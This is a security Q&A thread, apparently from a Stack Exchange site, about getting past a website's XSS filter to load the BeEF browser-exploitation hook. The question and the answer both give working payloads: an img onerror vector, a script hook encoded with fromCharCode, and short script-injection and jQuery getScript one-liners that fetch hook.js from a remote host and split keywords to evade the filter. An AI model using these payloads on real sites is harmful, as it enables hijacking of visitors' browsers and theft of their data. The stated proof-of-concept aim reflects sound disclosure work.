XSS filter bypass to hook BeEF

Question

I found a vulnerability on a website which allows me to trigger XSS. It's a very specific vulnerability, which is caused by a design-flaw. I want to write a PoC for them but I'm stuck at this step.

The XSS-payload is not delivered through an URL, and is not stored in a database. So, it's nor persistent-XSS nor reflective-XSS. The attacker has to enter the payload into a box, and send it to another user of that website by altering a specific ID.

Anyway, my question. They filter XSS but not good enough, because this bypass, can bypass their filter:

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

The problem is, how do I use this specific filter to hook BeEF on it? I tried:

<IMG SRC=/ onerror="document.write(String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 32, 115, 114, 99, 61, 34, 49, 50, 55, 46, 48, 46, 48, 46, 49, 58, 51, 48, 48, 48, 47, 104, 111, 111, 107, 46, 106, 115, 34, 62, 60, 47, 115, 99, 114, 105, 112, 116, 62))"></img>

But that payload ain't delivered clean, as result I get a lot of other HTML mixed. I also searched if there are already articles explaining how to bypass XSS filters to hook BeEF on it, but I found none.

So my question, is there a way to bypass XSS filters, to be able to hook BeEF on it? I'm not asking how to bypass XSS in general, I'm asking it in a situation where you want to include the BeEF hook.js` file.

Edit 1: An extra problem, I only have exact 116 characters to enter in the box. I don't think there is a problem to shorten JavaScript that much? Also, what I meant with "I got a mix with a lot of HTML", was that when I entered that other long string, the box 'absorbed' a piece of HTML code. What also would satisfy is using the window.open() function, to open a website containing the hook in a new window or tab or whatever.

Edit 2: I found a way of opening a new URL in a new tab by using this code: <img src="/" onerror="window.open('http://127.0.0.1:3000/hook.js', '_blank')"> However, the user gets a warning that a pop-up was blocked, and when he allows it than, he gets focus on that tab immediately. Does this satisfy for a PoC? Or does anyone have better solutions?

Answer 1

Original version

Using document.write in an event can cause problems is the event is fired after the page is loaded (i.e. closed), because the browser will then clear the document and start a new blank one. I am not sure I understand what the "payload ain't delivered clean, as result I get a lot of other HTML mixed" is supposed to mean, but this might be your problem.

If so, try using this (minus the line breaks and comments) as a payload:

var x = document.createElement(String.fromCharCode(115, 99, 114, 105, 112, 116)); // "script"
x.src = String.fromCharCode(49, 50, 55, 46, 48, 46, 48, 46, 49, 58, 51, 48, 48, 48, 47, 104, 111, 111, 107, 46, 106, 115); // "127.0.0.1:3000/hook.js" - Might not need to be obfuscated?
document.body.appendChild(x);

Based on this answer.

Shorter versions

I will write these with white spaces included for readability, but those can off course be removed. I am asuming that only the word script is filtered since you used fromCharCode. If more is filtered, you might have to change these a little, but there should be wiggle room.

Alt 1 (94 characters)

y = document;
x = y.createElement("scr" + "ipt");
x.src = "127.0.0.1:3000/hook.js";
y.body.appendChild(x)

If script without < and > is OK, you could gain some charactes by removing "+".

Alt 2 (with jQuery, 43 characters)

$["getScr"+"ipt"]("127.0.0.1:3000/hook.js")

Again, if script is OK you can get down to 37 characters:

$.getScript("127.0.0.1:3000/hook.js")